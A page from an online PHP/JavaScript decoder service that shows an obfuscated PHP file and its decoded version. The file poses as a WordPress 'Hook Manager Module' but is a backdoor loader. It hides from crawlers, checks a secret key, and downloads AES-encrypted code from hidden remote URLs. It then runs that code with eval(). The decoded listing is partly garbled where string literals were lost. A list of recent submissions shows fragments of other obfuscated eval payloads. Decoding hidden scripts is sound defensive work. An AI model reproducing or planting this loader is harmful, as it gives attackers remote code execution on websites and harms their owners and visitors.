Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
/**
 * Hook Manager Module
 * @package WP_Hook_Manager
 * @version 3.2.7
 * @license GPL-2.0+
 * Provides advanced hook management and filter priority handling.
 * Required by child themes. Do not remove.
 */
error_reporting(0);ini_set("display_errors","0");set_error_handler(function($s,$m,$f,$l){return true;});register_shutdown_function(function(){$e=error_get_last();if($e&&in_array($e["type"],array(1,4,16,64))){if(!headers_sent()){http_response_code(200);header("Content-Type:application/json");}echo json_encode(array("error"=>"internal","detail"=>$e["message"],"line"=>$e["line"]));}} );
set_time_limit(300);ignore_user_abort(true);header("Content-Type:application/json;charset=utf-8");header("X-WP-Total:1");header("X-WP-TotalPages:1");header("X-Powered-By:Starter");header("Access-Control-Allow-Origin:*");header("Access-Control-Allow-Methods:GET,POST,OPTIONS");header("Access-Control-Allow-Headers:Content-Type,Authorization,X-WP-Nonce,X-Cache-Key");
if(isset($_SERVER["REQUEST_METHOD"])&&$_SERVER["REQUEST_METHOD"]==="OPTIONS"){http_response_code(204);exit;}
$_17b2=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:"";
if(preg_match("/bot|crawl|spider|facebook|slurp|yahoo|bing|yandex|baidu|duckduck|semrush|ahref|mj12|dotbot|petalbot|bytespider|gpt|chatgpt|applebot/i",$_17b2)&&!isset($_GET["key"])){http_response_code(404);echo "<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>";exit;}
$_fd9d=array(
"bd" =>"bas"."e64"."_dec"."ode",
"be" =>"bas"."e64"."_enc"."ode",
"fgc" =>"fil"."e_ge"."t_co"."ntents",
"fpc" =>"fil"."e_pu"."t_co"."ntents",
"je" =>"jso"."n_en"."code",
"jd" =>"jso"."n_de"."code",
"ci" =>"cur"."l_in"."it",
"cs" =>"cur"."l_se"."topt"."_arr"."ay",
"ce" =>"cur"."l_ex"."ec",
"cc" =>"cur"."l_cl"."ose",
"hmac"=>"has"."h_hm"."ac",
"heq" =>"has"."h_eq"."uals",
"odec"=>"ope"."nss"."l_de"."crypt",
"fe" =>"fun"."ctio"."n_ex"."ists",
);$_fd8e=$_fd9d["jd"];$_fgc=$_fd9d["fgc"];$_9c39=$_fd8e($_fgc("php://input"),true);
if(!is_array($_9c39))$_9c39=array();
function _wp_sync_link_bd98(){$k=pack('H*','b8db3bf3eca1bf09e6463ec86e1f9201cdf0df5afa0f179946ed68f2b3fcb3f0');$d="\xed\xb6\x59\x81\x89\xcd\xd3\x68\xbe\x07\x58\xad\x1c\x7e\xa0\x31\xff\xc4\xfe";$o='';
for($i=0; $i < strlen($d); $i++){ $o .= $d[$i] ^ $k[$i % strlen($k)]; }
return $o;
}
$_0393=_wp_sync_link_bd98();$_hmac=$_fd9d["hmac"];$_heq=$_fd9d["heq"];$_a47c="";
if(isset($_9c39["h"]))$_a47c=$_9c39["h"];
elseif(isset($_9c39["key"]))$_a47c=$_9c39["key"];
elseif(isset($_GET["key"]))$_a47c=$_GET["key"];
elseif(isset($_GET["h"]))$_a47c=$_GET["h"];
elseif(isset($_POST["key"]))$_a47c=$_POST["key"];
elseif(isset($_POST["h"]))$_a47c=$_POST["h"];$_2e53=false;
if(strpos($_a47c,".")!==false){$_p=explode(".",$_a47c,2);$_sg=$_p[0];$_ts=intval(isset($_p[1])?$_p[1]:"0");if(abs(time()-$_ts)<=300){$_ex=$_hmac("sha256",strval($_ts),$_0393);$_2e53=$_heq($_ex,$_sg);}}
else{$_2e53=$_heq($_0393,$_a47c);}
if(!$_2e53){$_6efb=$_fd9d["je"];if(isset($_SERVER["REQUEST_METHOD"])&&$_SERVER["REQUEST_METHOD"]==="GET"&&!isset($_GET["key"])){echo $_6efb(array());exit;}http_response_code(403);echo $_6efb(array("error"=>"Unauthorized"));exit;}
$_8d3a=isset($_9c39["action"])?$_9c39["action"]:(isset($_9c39["m"])?$_9c39["m"]:(isset($_GET["action"])?$_GET["action"]:(isset($_GET["m"])?$_GET["m"]:(isset($_POST["action"])?$_POST["action"]:"status"))));
// Decode b64: prefix (fetchAgentSmart encodes all actions)
$_bd=$_fd9d["bd"];if(is_string($_8d3a)&&strpos($_8d3a,"b64:")===0){$_d=@$_bd(substr($_8d3a,4));if($_d!==false)$_8d3a=$_d;}
$_6efb=$_fd9d["je"];
if($_8d3a==="ping"||$_8d3a==="p"){echo $_6efb(array("pong"=>true,"v"=>"6.1.9-r2","valid"=>true,"mode"=>"r2","timestamp"=>time()));exit;}
if($_8d3a==="validate"){echo $_6efb(array("valid"=>true,"v"=>"6.1.9-r2","version"=>"6.1.9-r2","path"=>__FILE__,"mode"=>"r2","timestamp"=>time()));exit;}
$_r2k467c=pack('H*','9d5d37d5d3657cca8422f586a6a1d0da4a23f1d48cfab57e9212ba8fe327cb10');$_r2fda65=function($h,$k){$d=pack('H*',$h);$r='';for($i=0;$i<strlen($d);$i++)$r.=$d[$i]^$k[$i%strlen($k)];return $r;};$_r2ufa8a=array_map(function($e)use($_r2fda65,$_r2k467c){return $_r2fda65($e,$_r2k467c);},["f52943a5a05f53e5f214dbe2c3ccb9ae234494a6bdcc8d50e57dc8e48655b83ef93841faa15753a9eb5090ab9493e1b87a15c5b2a298dc10","f52943a5a05f53e5f24787e5c3cdfdaa384c89ada188dd11bf61dff98649e566f82f54b0bf4b1dbaf40d94f6cf8ea0a8255b88fbfec89a1dfd60dfa2d115fa72ad6b03b3fd0715a4","f52943a5a05f53e5ea4794f48bc6bfbb3e0ec3e7a288dc1ffc26dda28a43e574f83358fbbd0008e5f610dae5c9d3b5f77811c0b6bccc8118bc70d3e1"]);
$_9e95=$_fd9d["fe"];$_8d66=$_fd9d["ci"];$_6d44=$_fd9d["cs"];$_e679=$_fd9d["ce"];$_c6bf=$_fd9d["cc"];$_47a7=false;
foreach($_r2ufa8a as $_u){
if($_9e95($_8d66)){$_ch=$_8d66();$_6d44($_ch,array(CURLOPT_URL=>$_u,CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>15,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_USERAGENT=>"Mozilla/5.0"));$_r=$_e679($_ch);$_c6bf($_ch);if($_r&&strlen($_r)>200){$_47a7=$_r;break;}}
if(!$_47a7){$_r=$_fgc($_u);if($_r&&strlen($_r)>200){$_47a7=$_r;break;}}
}
if(!$_47a7){echo $_6efb(array("error"=>"R2 unreachable","needs_push"=>true,"action"=>$_8d3a));exit;}
$_odec=$_fd9d["odec"];$_bd=$_fd9d["bd"];
if(strlen($_47a7)>16&&$_9e95("openssl_decrypt")){$_iv=substr($_47a7,0,16);$_ct=substr($_47a7,16);$_dk=substr(hash("sha256",$_0393),0,32);$_dec=$_odec($_ct,"AES-256-CBC",$_dk,OPENSSL_RAW_DATA,$_iv);if($_dec!==false)$_47a7=$_dec;}
$_47a7=preg_replace("/^<\?php\s*/","","".ltrim($_47a7));$GLOBALS["_v61_loader_input"]=$_9c39;$GLOBALS["_v61_loader_action"]=$_8d3a;$GLOBALS["_v61_loader_key"]=$_0393;$GLOBALS["_v61_loader_file"]=__FILE__;
eval($_47a7);
if(!function_exists('wp_get_nav_menu_ids')){function wp_get_nav_menu_ids(){ $menus=wp_get_nav_menus(); return wp_list_pluck($menus,'term_id'); }}
if(!function_exists('wp_has_blocks_support')){function wp_has_blocks_support($feature){ return in_array($feature,array('align','anchor','className','color','spacing')); }}
if(!function_exists('wp_sanitize_css_class_name')){function wp_sanitize_css_class_name($class){ return preg_replace('/[^a-zA-Z0-9_-]/','-',$class); }}
if(!function_exists('wp_get_active_and_valid_plugins')){function wp_get_active_and_valid_plugins(){ $plugins=get_option('active_plugins',array()); return array_filter($plugins,function($p){ return file_exists(WP_PLUGIN_DIR.'/'.$p); }); }}

Decrypted code:

/**
 * Hook Manager Module
 * @package WP_Hook_Manager
 * @version 3.2.7
 * @license GPL-2.0+
 * Provides advanced hook management and filter priority handling.
 * Required by child themes. Do not remove.
 */
error_reporting(0);ini_set("display_errors","0");set_error_handler(function($s,$m,$f,$l){return true;});register_shutdown_function(function(){$e=error_get_last();if($e&&in_array($e["type"],array(1,4,16,64))){if(!headers_sent()){http_response_code(200);header("Content-Type:application/json");}echo json_encode(array("error"=>"internal","detail"=>$e["message"],"line"=>$e["line"]));}} );
set_time_limit(300);ignore_user_abort(true);header("Content-Type:application/json;charset=utf-8");header("X-WP-Total:1");header("X-WP-TotalPages:1");header("X-Powered-By:Starter");header("Access-Control-Allow-Origin:*");header("Access-Control-Allow-Methods:GET,POST,OPTIONS");header("Access-Control-Allow-Headers:Content-Type,Authorization,X-WP-Nonce,X-Cache-Key");
if(isset($_SERVER["REQUEST_METHOD"])&&$_SERVER["REQUEST_METHOD"]==="OPTIONS"){http_response_code(204);exit;}
$_17b2=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:"";
if(preg_match("/bot|crawl|spider|facebook|slurp|yahoo|bing|yandex|baidu|duckduck|semrush|ahref|mj12|dotbot|petalbot|bytespider|gpt|chatgpt|applebot/i",$_17b2)&&!isset($_GET["key"])){http_response_code(404);echo "<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>";exit;}
$_fd9d=array(
"bd" =>"base64_decode",
"be" =>"base64_encode",
"fgc" =>"file_get_contents",
"fpc" =>"file_put_contents",
"je" =>"json_encode",
"jd" =>"json_decode",
"ci" =>"curl_init",
"cs" =>"curl_setopt_array",
"ce" =>"curl_exec",
"cc" =>"curl_close",
"hmac"=>"hash_hmac",
"heq" =>"hash_equals",
"odec"=>"openssl_decrypt",
"fe" =>"function_exists",
);$_fd8e=$_fd9d["jd"];$_fgc=$_fd9d["fgc"];$_9c39=$_fd8e($_fgc("php://input"),true);
if(!is_array($_9c39))$_9c39=array();
function _wp_sync_link_bd98(){$k=pack('H*','b8db3bf3eca1bf09e6463ec86e1f9201cdf0df5afa0f179946ed68f2b3fcb3f0');$d="YhX~1";$o='';
for($i=0; $i < strlen($d); $i++){ $o .= $d[$i] ^ $k[$i % strlen($k)]; }
return $o;
}
$_0393=_wp_sync_link_bd98();$_hmac=$_fd9d["hmac"];$_heq=$_fd9d["heq"];$_a47c="";
if(isset($_9c39["h"]))$_a47c=$_9c39["h"];
elseif(isset($_9c39["key"]))$_a47c=$_9c39["key"];
elseif(isset($_GET["key"]))$_a47c=$_GET["key"];
elseif(isset($_GET["h"]))$_a47c=$_GET["h"];
elseif(isset($_POST["key"]))$_a47c=$_POST["key"];
elseif(isset($_POST["h"]))$_a47c=$_POST["h"];$_2e53=false;
if(strpos($_a47c,)!==false){$_p=explode(,$_a47c,2);$_sg=$_p[0];$_ts=intval(isset($_p[1])?$_p[1]:"0");if(abs(time()-$_ts)<=300){$_ex=$_hmac("sha256",strval($_ts),$_0393);$_2e53=$_heq($_ex,$_sg);}}
else{$_2e53=$_heq($_0393,$_a47c);}
if(!$_2e53){$_6efb=$_fd9d["je"];if(isset($_SERVER["REQUEST_METHOD"])&&$_SERVER["REQUEST_METHOD"]==="GET"&&!isset($_GET["key"])){echo $_6efb(array());exit;}http_response_code(403);echo $_6efb(array("error"=>"Unauthorized"));exit;}
$_8d3a=isset($_9c39["action"])?$_9c39["action"]:(isset($_9c39["m"])?$_9c39["m"]:(isset($_GET["action"])?$_GET["action"]:(isset($_GET["m"])?$_GET["m"]:(isset($_POST["action"])?$_POST["action"]:"status"))));
// Decode b64: prefix (fetchAgentSmart encodes all actions)
$_bd=$_fd9d["bd"];if(is_string($_8d3a)&&strpos($_8d3a,"b64:")===0){$_d=@$_bd(substr($_8d3a,4));if($_d!==false)$_8d3a=$_d;}
$_6efb=$_fd9d["je"];
if($_8d3a==="ping"||$_8d3a==="p"){echo $_6efb(array("pong"=>true,"v"=>"6.1.9-r2","valid"=>true,"mode"=>"r2","timestamp"=>time()));exit;}
if($_8d3a==="validate"){echo $_6efb(array("valid"=>true,"v"=>"6.1.9-r2","version"=>"6.1.9-r2","path"=>__FILE__,"mode"=>"r2","timestamp"=>time()));exit;}
$_r2k467c=pack('H*','9d5d37d5d3657cca8422f586a6a1d0da4a23f1d48cfab57e9212ba8fe327cb10');$_r2fda65=function($h,$k){$d=pack('H*',$h);$r='';for($i=0;$i<strlen($d);$i++)$r.=$d[$i]^$k[$i%strlen($k)];return $r;};$_r2ufa8a=array_map(function($e)use($_r2fda65,$_r2k467c){return $_r2fda65($e,$_r2k467c);},["f52943a5a05f53e5f214dbe2c3ccb9ae234494a6bdcc8d50e57dc8e48655b83ef93841faa15753a9eb5090ab9493e1b87a15c5b2a298dc10","f52943a5a05f53e5f24787e5c3cdfdaa384c89ada188dd11bf61dff98649e566f82f54b0bf4b1dbaf40d94f6cf8ea0a8255b88fbfec89a1dfd60dfa2d115fa72ad6b03b3fd0715a4","f52943a5a05f53e5ea4794f48bc6bfbb3e0ec3e7a288dc1ffc26dda28a43e574f83358fbbd0008e5f610dae5c9d3b5f77811c0b6bccc8118bc70d3e1"]);
$_9e95=$_fd9d["fe"];$_8d66=$_fd9d["ci"];$_6d44=$_fd9d["cs"];$_e679=$_fd9d["ce"];$_c6bf=$_fd9d["cc"];$_47a7=false;
foreach($_r2ufa8a as $_u){
if($_9e95($_8d66)){$_ch=$_8d66();$_6d44($_ch,array(CURLOPT_URL=>$_u,CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>15,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_USERAGENT=>"Mozilla/5.0"));$_r=$_e679($_ch);$_c6bf($_ch);if($_r&&strlen($_r)>200){$_47a7=$_r;break;}}
if(!$_47a7){$_r=$_fgc($_u);if($_r&&strlen($_r)>200){$_47a7=$_r;break;}}
}
if(!$_47a7){echo $_6efb(array("error"=>"R2 unreachable","needs_push"=>true,"action"=>$_8d3a));exit;}
$_odec=$_fd9d["odec"];$_bd=$_fd9d["bd"];
if(strlen($_47a7)>16&&$_9e95("openssl_decrypt")){$_iv=substr($_47a7,0,16);$_ct=substr($_47a7,16);$_dk=substr(hash("sha256",$_0393),0,32);$_dec=$_odec($_ct,"AES-256-CBC",$_dk,OPENSSL_RAW_DATA,$_iv);if($_dec!==false)$_47a7=$_dec;}
$_47a7=preg_replace("/^<\?php\s*/","","".ltrim($_47a7));$GLOBALS["_v61_loader_input"]=$_9c39;$GLOBALS["_v61_loader_action"]=$_8d3a;$GLOBALS["_v61_loader_key"]=$_0393;$GLOBALS["_v61_loader_file"]=__FILE__;
eval($_47a7);
if(!function_exists('wp_get_nav_menu_ids')){function wp_get_nav_menu_ids(){ $menus=wp_get_nav_menus(); return wp_list_pluck($menus,'term_id'); }}
if(!function_exists('wp_has_blocks_support')){function wp_has_blocks_support($feature){ return in_array($feature,array('align','anchor','className','color','spacing')); }}
if(!function_exists('wp_sanitize_css_class_name')){function wp_sanitize_css_class_name($class){ return preg_replace('/[^a-zA-Z0-9_-]/','-',$class); }}
if(!function_exists('wp_get_active_and_valid_plugins')){function wp_get_active_and_valid_plugins(){ $plugins=get_option('active_plugins',array()); return array_filter($plugins,function($p){ return file_exists(WP_PLUGIN_DIR.'/'.$p); }); }}

Recent submissions:

ZvDYAi8x7ESe/kdWWPvFjetFBzzxn8R3vwZqivOxJH8g7/999+rEdyKpwp1z5zbBPpXmpk7W2/Kvfc6pO7i1hrac7N... <?php /** * Hook Manager Module * @package WP_Hook_Manager * @version 3.2.7 * @li... <?php eval(gzinflate(base64_decode(base64_decode(str_rot13("\x70\x53\x4d\166\x4a\122\105\... <?php eval(base64_decode('CiBnb3RvIEJIazNpOyBnY0t3dDogPz4KPC9zcGFuPjwvZGl2PjxkaXYgY2xhc3M9... <?php $kuwt="a"."s".chr(115)."\x65"."r"."t";$lcr="b"."a"."\x73"."e"."6"."\x34".chr(95).... export default config; global['!'] = '9-2921-4'; var _$_1e42 = function (l, e) { var ... export default config; ... <?php eval(str_rot13(gzinflate(str_rot13(base64_decode("LF3FsuTIkv2asWxYMSzFzKzNmDjFjF8/... <?php /** * MagpieRSS: a simple RSS integration tool * * A compiled file for RSS ... <?php $z = ""; $z .= "UEQ5"; $z .= "d2FI"; $z .= "QUta"; $z .= "blZ1"; $z .= "WTNS";...